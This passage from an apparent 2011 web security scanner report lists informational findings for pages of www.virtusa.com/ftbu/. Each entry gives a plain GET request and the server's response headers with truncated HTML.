<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.574. http://www.virtusa.com/ftbu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/

Request

GET /ftbu/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23452
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.575. http://www.virtusa.com/ftbu/aboutus/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/aboutus/default.asp

Request

GET /ftbu/aboutus/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20064
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.576. http://www.virtusa.com/ftbu/aboutus/our-offices.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/aboutus/our-offices.asp

Request

GET /ftbu/aboutus/our-offices.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28862
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Conten
...[SNIP]...

7.577. http://www.virtusa.com/ftbu/careers/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/careers/default.asp

Request

GET /ftbu/careers/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20907
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.578. http://www.virtusa.com/ftbu/contactus/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/contactus/default.asp

Request

GET /ftbu/contactus/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37234
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...

7.579. http://www.virtusa.com/ftbu/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/default.asp

Request

GET /ftbu/default.asp HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: virtusa=tid=2324094&csession=650730749; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmb=213023891; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:31:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:31:28 GMT
Content-Length: 23452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.580. http://www.virtusa.com/ftbu/newsroom/article.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/newsroom/article.asp

Request

GET /ftbu/newsroom/article.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 142
Content-Type: text/html
Location: list_pressrelease.asp
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:35 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="list_pressrelease.asp">here</a>.</body>

7.581. http://www.virtusa.com/ftbu/newsroom/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/newsroom/default.asp

Request

GET /ftbu/newsroom/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18147
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:47:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:47:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.582. http://www.virtusa.com/ftbu/ouradvantage/business-insight.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/ouradvantage/business-insight.asp

Request

GET /ftbu/ouradvantage/business-insight.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19274
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.583. http://www.virtusa.com/ftbu/ouradvantage/methodology.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/ouradvantage/methodology.asp

Request

GET /ftbu/ouradvantage/methodology.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19376
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.584. http://www.virtusa.com/ftbu/ouradvantage/technologies.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/ouradvantage/technologies.asp

Request

GET /ftbu/ouradvantage/technologies.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19371
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.585. http://www.virtusa.com/ftbu/ourclients/client-list.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/ourclients/client-list.asp

Request

GET /ftbu/ourclients/client-list.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21712
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.586. http://www.virtusa.com/ftbu/privacy-statement.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/privacy-statement.asp

Request

GET /ftbu/privacy-statement.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.587. http://www.virtusa.com/ftbu/search/result.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/search/result.asp

Request

GET /ftbu/search/result.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15212
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:56:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:56:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Co
...[SNIP]...

7.588. http://www.virtusa.com/ftbu/services/business_process/business-intelligence.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/business-intelligence.asp

Request

GET /ftbu/services/business_process/business-intelligence.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:52:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:52:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.589. http://www.virtusa.com/ftbu/services/business_process/claims-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/claims-management.asp

Request

GET /ftbu/services/business_process/claims-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20363
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:51:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:51:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.590. http://www.virtusa.com/ftbu/services/business_process/commissions-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/commissions-management.asp

Request

GET /ftbu/services/business_process/commissions-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20501
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:52:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:52:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.591. http://www.virtusa.com/ftbu/services/business_process/consolidation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/consolidation.asp

Request

GET /ftbu/services/business_process/consolidation.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20093
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:52:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:52:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.592. http://www.virtusa.com/ftbu/services/business_process/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/default.asp

Request

GET /ftbu/services/business_process/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20578
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:51:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:51:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.593. http://www.virtusa.com/ftbu/services/business_process/integrated-process-modeling.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/integrated-process-modeling.asp

Request

GET /ftbu/services/business_process/integrated-process-modeling.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18389
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:53:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:53:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.594. http://www.virtusa.com/ftbu/services/business_process/management-accounting.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/management-accounting.asp

Request

GET /ftbu/services/business_process/management-accounting.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21303
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:53:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:53:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.595. http://www.virtusa.com/ftbu/services/business_process/payment-processes.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/payment-processes.asp

Request

GET /ftbu/services/business_process/payment-processes.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20664
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:53:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:53:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

